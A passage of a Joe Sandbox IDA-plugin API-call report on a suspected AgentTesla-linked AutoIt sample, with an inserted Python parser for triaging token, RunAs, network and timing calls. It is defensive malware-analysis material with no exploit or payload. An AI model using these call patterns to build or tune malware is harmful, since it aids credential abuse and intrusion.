                                            • Part of subcall function 00E2F5AD: lstrcmpiW.KERNEL32(00000000,?,00E2E1C4,?,?,?,00E2EFB7,00000000,000000EF,00000119,?,?), ref: 00E2F613
                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00E2EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E2E1DD
                                          • lstrcpyW.KERNEL32(00000000,?,?,00E2EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E2E203
                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E2EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E2E237
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: lstrcmpilstrcpylstrlen
                                          • String ID: cdecl
                                          • API String ID: 4031866154-3896280584
                                          • Opcode ID: 976ba2514e4abfa62131320d89f3dd20e67993590d1f3cd79e255ea68739da0a
                                          • Instruction ID: aac0a7490019193341c9c91236913b97294477f2e84997916d7c2a54befdf202
                                          • Opcode Fuzzy Hash: 976ba2514e4abfa62131320d89f3dd20e67993590d1f3cd79e255ea68739da0a
                                          • Instruction Fuzzy Hash: 4711B137100365EFCB29AF74E84597A77B8FF44310B40902AE806DB260EF719850C7A0
                                          APIs
                                          • _free.LIBCMT ref: 00E05351
                                            • Part of subcall function 00DF594C: __FF_MSGBANNER.LIBCMT ref: 00DF5963
                                            • Part of subcall function 00DF594C: __NMSG_WRITE.LIBCMT ref: 00DF596A
                                            • Part of subcall function 00DF594C: RtlAllocateHeap.NTDLL(00F60000,00000000,00000001), ref: 00DF598F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_free
                                          • String ID:
                                          • API String ID: 614378929-0
                                          • Opcode ID: bfd050e76d47970eddfe768a961d954efef5957dc330ea7d5c2bf410e80a0d61
                                          • Instruction ID: e61feb627f248471373c1c1b4df5bb8ffbe4671f9fb1d709f3cd7292345246c7
                                          • Opcode Fuzzy Hash: bfd050e76d47970eddfe768a961d954efef5957dc330ea7d5c2bf410e80a0d61
                                          • Instruction Fuzzy Hash: 0D11E733504B19AFCF312F70AC0567F3798DF103A4B11942AFA45B61D0DE7989819B70
                                          APIs
                                          • _memset.LIBCMT ref: 00DD4560
                                            • Part of subcall function 00DD410D: _memset.LIBCMT ref: 00DD418D
                                            • Part of subcall function 00DD410D: _wcscpy.LIBCMT ref: 00DD41E1
                                            • Part of subcall function 00DD410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DD41F1
                                          • KillTimer.USER32(?,00000001,?,?), ref: 00DD45B5
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DD45C4
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E0D6CE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                          • String ID:
                                          • API String ID: 1378193009-0
                                          • Opcode ID: 403f8f767c4f05db1f4fda9c456c6c3e4eb0c8f8454d0668660e63a610690c03
                                          • Instruction ID: 60ad3b0fa45efe63aaaca140e6f0d0ffc7d04dc1527b6702e8a3f5b07782af4f
                                          • Opcode Fuzzy Hash: 403f8f767c4f05db1f4fda9c456c6c3e4eb0c8f8454d0668660e63a610690c03
                                          • Instruction Fuzzy Hash: 5021FC709087849FEB328B64EC45BE7BBEC9F01308F04109FE69D66281C7755AC8CB61
                                          APIs
                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E28B2A
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00E28B31
                                          • CloseHandle.KERNEL32(00000004), ref: 00E28B4B
                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E28B7A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                          • String ID:
                                          • API String ID: 2621361867-0
                                          • Opcode ID: 2a6c52f1c2c2bc11f840e016028c741f876bce4d8f09b7f04d3981a1c9a2b433
                                          • Instruction ID: 585d0d38bd2dfdd3055205b1dd2c5baf5dd74372f36d24d88e5b9de99687ee88
                                          • Opcode Fuzzy Hash: 2a6c52f1c2c2bc11f840e016028c741f876bce4d8f09b7f04d3981a1c9a2b433
                                          • Instruction Fuzzy Hash: C01159B650120DAFDF018FA5ED49FDA7BA9EF08309F085069FE04B2160C7768D64EB60
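Two of the entries above are the ones a reviewer of this listing actually cares about: the function at 00E28BEB that pulls the token's privileges (GetTokenInformation with class 00000003), looks up a privilege LUID and _memcmp's it against the array, and the function at 00E28B7A that opens the current process token and then calls CreateProcessWithLogonW. Picking those out of hundreds of near-identical entries by hand is slow, so the following Python is an added example of a small parser and triage pass over this report format. It is not part of the Joe Sandbox report and not code from AutoIt or AgentTesla. The watchlist and tag names are the example author's choices, the sample text is constructed to mirror the layout seen here (bullets, "Part of subcall function", "ref:", the Similarity fields) using a few lines from this listing, and the TOKEN_INFORMATION_CLASS table contains only the winnt.h values the example needs. Decoding the raw class value (3 is TokenPrivileges) rather than trusting a report's parenthetical annotation is the check worth keeping.

```python
"""Parse Joe Sandbox per-function API listings and tag the entries worth a closer look.

Added example, not Joe Sandbox, AutoIt or AgentTesla code. SAMPLE below is
constructed to mirror the report layout using a few lines from the listing.
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# One API call line. Three shapes occur in the report:
#   • OpenProcessToken.ADVAPI32(00000000), ref: 00E28B31
#   • Part of subcall function 00E28652: GetTokenInformation.ADVAPI32(?,00000003,?), ref: 00E28669
#   • _memcmp.LIBCMT ref: 00E28C0E        (CRT helpers carry no argument list and no comma)
CALL_RE = re.compile(
    r"^\s*[•*-]\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
FIELD_RE = re.compile(r"^\s*[•*-]\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")
KEEP_FIELDS = {"API ID", "String ID", "Opcode ID", "Instruction Fuzzy Hash"}

# TOKEN_INFORMATION_CLASS values from winnt.h (only the ones this example needs).
TOKEN_INFO_CLASS = {1: "TokenUser", 3: "TokenPrivileges", 20: "TokenElevation", 25: "TokenIntegrityLevel"}

# Watchlist: API name -> behaviour tag. Chosen for this example, not taken from Joe Sandbox.
WATCHLIST = {
    "OpenProcessToken": "token-inspection", "GetTokenInformation": "token-inspection",
    "LookupPrivilegeValueW": "token-inspection",
    "CreateProcessWithLogonW": "runas-process-creation", "CreateProcessW": "process-creation",
    "InternetConnectW": "wininet", "InternetOpenUrlW": "wininet", "gethostbyname": "dns-resolution",
    "QueryPerformanceCounter": "timing", "Sleep": "timing",
}

@dataclass
class Call:
    api: str
    module: str
    args: list[str]
    ref: str
    subcall_of: str | None   # callee address when the line is "Part of subcall function"

@dataclass
class Entry:
    calls: list[Call] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)

def parse_report(text: str) -> list[Entry]:
    """One Entry per 'APIs' header; collect its call lines and the Similarity fields we keep."""
    entries: list[Entry] = []
    for raw in text.splitlines():
        if raw.strip() == "APIs":
            entries.append(Entry())
            continue
        if not entries:
            continue                      # text before the first 'APIs' header is not an entry
        m = CALL_RE.match(raw)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            entries[-1].calls.append(Call(m["api"], m["mod"], args, m["ref"].upper(), m["sub"]))
            continue
        f = FIELD_RE.match(raw)
        if f and f["key"] in KEEP_FIELDS:
            entries[-1].fields[f["key"]] = f["val"]
    return entries

def decode_token_class(call: Call) -> str | None:
    """Name the TOKEN_INFORMATION_CLASS from GetTokenInformation's second argument (raw hex)."""
    if call.api != "GetTokenInformation" or len(call.args) < 2:
        return None
    m = re.match(r"([0-9A-Fa-f]+)", call.args[1])
    return TOKEN_INFO_CLASS.get(int(m.group(1), 16)) if m else None

def tag_entry(entry: Entry, include_subcalls: bool = True) -> set[str]:
    """Tags for an entry; subcall lines describe callees, so they can be excluded."""
    tags: set[str] = set()
    for c in entry.calls:
        if c.subcall_of and not include_subcalls:
            continue
        if c.api in WATCHLIST:
            tags.add(WATCHLIST[c.api])
        cls = decode_token_class(c)
        if cls:
            tags.add(f"token-class:{cls}")
    return tags

def triage(text: str) -> list[tuple[str, list[str]]]:
    """(Opcode ID prefix, sorted tags) for every entry that hits the watchlist."""
    return [(e.fields.get("Opcode ID", "?")[:12], sorted(t))
            for e in parse_report(text) if (t := tag_entry(e))]

# Constructed sample in the report's layout (values copied from a few entries of this listing).
SAMPLE = """\
APIs
  • Part of subcall function 00E28652: GetTokenInformation.ADVAPI32(?,00000003,?,00000000,?), ref: 00E28669
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E28BEB
• _memcmp.LIBCMT ref: 00E28C0E
• HeapFree.KERNEL32(00000000), ref: 00E28C4B
Memory Dump Source
• Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
Similarity
• API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
• String ID:
• Opcode ID: 183a53b1601bb875f1d52c3482ca7242da7b02a92f16f264f7938f1b6d439562
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E28B2A
• OpenProcessToken.ADVAPI32(00000000), ref: 00E28B31
• CloseHandle.KERNEL32(00000004), ref: 00E28B4B
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E28B7A
Similarity
• Opcode ID: 2a6c52f1c2c2bc11f840e016028c741f876bce4d8f09b7f04d3981a1c9a2b433
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00E29043
Similarity
• Opcode ID: b08ec163962e93629ae1ef37c9a7c538954f7701fdc04a72cbe34f137bd49d52
"""

if __name__ == "__main__":
    for opcode_prefix, tags in triage(SAMPLE):
        print(opcode_prefix, ", ".join(tags))
```

Run against the full report text instead of SAMPLE and the SendMessageW, GetWindowRect and timer entries drop out, leaving the token, RunAs, WinINet, gethostbyname and timing functions. Since the sample is a compiled AutoIt script, most of these are AutoIt runtime internals (RunAs, TCPNameToIP, InetGet, Sleep); what matters for the case is which of them the embedded script actually reaches, which this listing alone does not tell you.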
                                          APIs
                                            • Part of subcall function 00DD5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E37B20,?,?,00000000), ref: 00DD5B8C
                                            • Part of subcall function 00DD5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E37B20,?,?,00000000,?,?), ref: 00DD5BB0
                                          • gethostbyname.WS2_32(?), ref: 00E466AC
                                          • WSAGetLastError.WS2_32(00000000), ref: 00E466B7
                                          • _memmove.LIBCMT ref: 00E466E4
                                          • inet_ntoa.WS2_32(?), ref: 00E466EF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                          • String ID:
                                          • API String ID: 1504782959-0
                                          • Opcode ID: 7fd5d8cd48c746c97267a94d0921955fa114f56c4ecf43d3319dc4867577b37d
                                          • Instruction ID: 5e08c3219cc99a658d5e326323f6da90b471434475eb1c737e56e272ba781f8b
                                          • Opcode Fuzzy Hash: 7fd5d8cd48c746c97267a94d0921955fa114f56c4ecf43d3319dc4867577b37d
                                          • Instruction Fuzzy Hash: D8115B36900609AFCB04EBA4ED96DEEB7B8EF44311B144066F506B72A1DF31AE04CB71
                                          APIs
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00E29043
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E29055
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E2906B
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E29086
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: b08ec163962e93629ae1ef37c9a7c538954f7701fdc04a72cbe34f137bd49d52
                                          • Instruction ID: a708c490c0f0db5c1e1a351a845393c7b26de42a9b1dc8584880478a34d8ea59
                                          • Opcode Fuzzy Hash: b08ec163962e93629ae1ef37c9a7c538954f7701fdc04a72cbe34f137bd49d52
                                          • Instruction Fuzzy Hash: 5C115E79900218FFEB10DFA5CC84EDDBBB4FB48710F2050A5EA04B7290D6716E10DB90
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E301FD,?,00E31250,?,00008000), ref: 00E3166F
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00E301FD,?,00E31250,?,00008000), ref: 00E31694
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E301FD,?,00E31250,?,00008000), ref: 00E3169E
                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,00E301FD,?,00E31250,?,00008000), ref: 00E316D1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CounterPerformanceQuerySleep
                                          • String ID:
                                          • API String ID: 2875609808-0
                                          • Opcode ID: 650285fcda94a541e06aad6587c7fe35041dd56ee2ed2cf6dcecb66bbac2e8ac
                                          • Instruction ID: efc13da76e44ed8cc59ae20c66491187e9570f30b5e139eddbbd9359668aeec2
                                          • Opcode Fuzzy Hash: 650285fcda94a541e06aad6587c7fe35041dd56ee2ed2cf6dcecb66bbac2e8ac
                                          • Instruction Fuzzy Hash: 93115A31C01A1CDBCF04AFE6D94AAEEBF78FF09742F054499E940B2241CB305560CBA6
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction ID: e8e2ed4dc54aeacba1cdc139ffda981a37138ed391e9cf92dc4beebc6bed1f4f
                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction Fuzzy Hash: CC01807284414EBBCF525F84CC018EE3F62BF59345B499515FA9868071D237E9B1AB81
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 00E5B59E
                                          • ScreenToClient.USER32(?,?), ref: 00E5B5B6
                                          • ScreenToClient.USER32(?,?), ref: 00E5B5DA
                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E5B5F5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ClientRectScreen$InvalidateWindow
                                          • String ID:
                                          • API String ID: 357397906-0
                                          • Opcode ID: e2328afe61a706c1503880ba9296c6c799409000dc9a90d6a2bc91c30d460ba2
                                          • Instruction ID: 44254dcf85371cb2082c1b21b0df8288d18e6d8b201d89ddcae09dcb3c7d7e98
                                          • Opcode Fuzzy Hash: e2328afe61a706c1503880ba9296c6c799409000dc9a90d6a2bc91c30d460ba2
                                          • Instruction Fuzzy Hash: 0A1143B9D00209EFDB41CFA9C8849EEFBB9FB08311F108566E915E3220D775AA558F91
                                          APIs
                                          • _memset.LIBCMT ref: 00E5B8FE
                                          • _memset.LIBCMT ref: 00E5B90D
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E97F20,00E97F64), ref: 00E5B93C
                                          • CloseHandle.KERNEL32 ref: 00E5B94E
                                          Similarity
                                          • API ID: _memset$CloseCreateHandleProcess
                                          • String ID:
                                          • API String ID: 3277943733-0
                                          • Opcode ID: 319801c30fe9681c7720ff032a079535f7664dca32e7b1b7493124ea119a3a69
                                          • Instruction ID: 76b6b556f9c9ccf59cdcb104e76124de7f4bcbbaa16b799e35c218c08f98d4eb
                                          • Opcode Fuzzy Hash: 319801c30fe9681c7720ff032a079535f7664dca32e7b1b7493124ea119a3a69
                                          • Instruction Fuzzy Hash: 31F054B26543047FF6102B62AC06F7B3A5CEB09355F005422FB48F51A1D771490887B8
                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 00E36E88
                                            • Part of subcall function 00E3794E: _memset.LIBCMT ref: 00E37983
                                          • _memmove.LIBCMT ref: 00E36EAB
                                          • _memset.LIBCMT ref: 00E36EB8
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00E36EC8
                                          Similarity
                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                          • String ID:
                                          • API String ID: 48991266-0
                                          • Opcode ID: ea07c029d2251e06f10b099bac132c354a6642ae4c6cfc0fc6f00cff58f79ce4
                                          • Instruction ID: c6df75f7eca6da809e05c65c7463015cdd5fd5e7dcc3b8f6fedc8dba7ede34c7
                                          • Opcode Fuzzy Hash: ea07c029d2251e06f10b099bac132c354a6642ae4c6cfc0fc6f00cff58f79ce4
                                          • Instruction Fuzzy Hash: 3EF0547A100204AFCF016F55DC85B5ABB69EF45321F04C061FE086E226CB31E951CBB4
                                          APIs
                                            • Part of subcall function 00DD12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DD134D
                                            • Part of subcall function 00DD12F3: SelectObject.GDI32(?,00000000), ref: 00DD135C
                                            • Part of subcall function 00DD12F3: BeginPath.GDI32(?), ref: 00DD1373
                                            • Part of subcall function 00DD12F3: SelectObject.GDI32(?,00000000), ref: 00DD139C
                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E5C030
                                          • LineTo.GDI32(00000000,?,?), ref: 00E5C03D
                                          • EndPath.GDI32(00000000), ref: 00E5C04D
                                          • StrokePath.GDI32(00000000), ref: 00E5C05B
                                          Similarity
                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                          • String ID:
                                          • API String ID: 1539411459-0
                                          • Opcode ID: d839afc8eafc8fab9a5b4b831aef485b0e31c98c8c36b118ec9e386cbee94eff
                                          • Instruction ID: 51f4a40b5d0f1d82ef39d37973eb3ab344411b2e51452962989636de8a8afa31
                                          • Opcode Fuzzy Hash: d839afc8eafc8fab9a5b4b831aef485b0e31c98c8c36b118ec9e386cbee94eff
                                          • Instruction Fuzzy Hash: DAF05E31001359FFDB266F56AC0EFCE3F99AF05312F184402FA11710E287765659DBA5
                                          APIs
                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E2A399
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E2A3AC
                                          • GetCurrentThreadId.KERNEL32 ref: 00E2A3B3
                                          • AttachThreadInput.USER32(00000000), ref: 00E2A3BA
                                          Similarity
                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                          • String ID:
                                          • API String ID: 2710830443-0
                                          • Opcode ID: 21b42eeef1c0f79500cb38c3832656de1b5238be49a4e8dc356d16b333872cc4
                                          • Instruction ID: 0274fbefd0938216afddafa4fb1620805db1a40d2ae565951a16cee1957a66f6
                                          • Opcode Fuzzy Hash: 21b42eeef1c0f79500cb38c3832656de1b5238be49a4e8dc356d16b333872cc4
                                          • Instruction Fuzzy Hash: D1E01571541328BBDB205FA2EC0CEDB3E1CEF167A2F048434F509A5061C6B1C5448BE0
                                          APIs
                                          • GetSysColor.USER32(00000008), ref: 00DD2231
                                          • SetTextColor.GDI32(?,000000FF), ref: 00DD223B
                                          • SetBkMode.GDI32(?,00000001), ref: 00DD2250
                                          • GetStockObject.GDI32(00000005), ref: 00DD2258
                                          • GetWindowDC.USER32(?,00000000), ref: 00E0C0D3
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E0C0E0
                                          • GetPixel.GDI32(00000000,?,00000000), ref: 00E0C0F9
                                          • GetPixel.GDI32(00000000,00000000,?), ref: 00E0C112
                                          • GetPixel.GDI32(00000000,?,?), ref: 00E0C132
                                          • ReleaseDC.USER32(?,00000000), ref: 00E0C13D
                                          Similarity
                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                          • String ID:
                                          • API String ID: 1946975507-0
                                          • Opcode ID: 64cc6d00e3a5569ebe2a29e43228174646c9a59a72ed6fc8219af180bcddfb12
                                          • Instruction ID: e2091efc50b395bfb91554d9f12f5d2a46ed73e15810b1fb47f4358a0afd82bc
                                          • Opcode Fuzzy Hash: 64cc6d00e3a5569ebe2a29e43228174646c9a59a72ed6fc8219af180bcddfb12
                                          • Instruction Fuzzy Hash: 3CE06D32100644EEDB255FB5FC0DBD87B20EB15337F148366FAA9680E287714984DB22
                                          APIs
                                          • GetCurrentThread.KERNEL32 ref: 00E28C63
                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E2882E), ref: 00E28C6A
                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E2882E), ref: 00E28C77
                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E2882E), ref: 00E28C7E
                                          Similarity
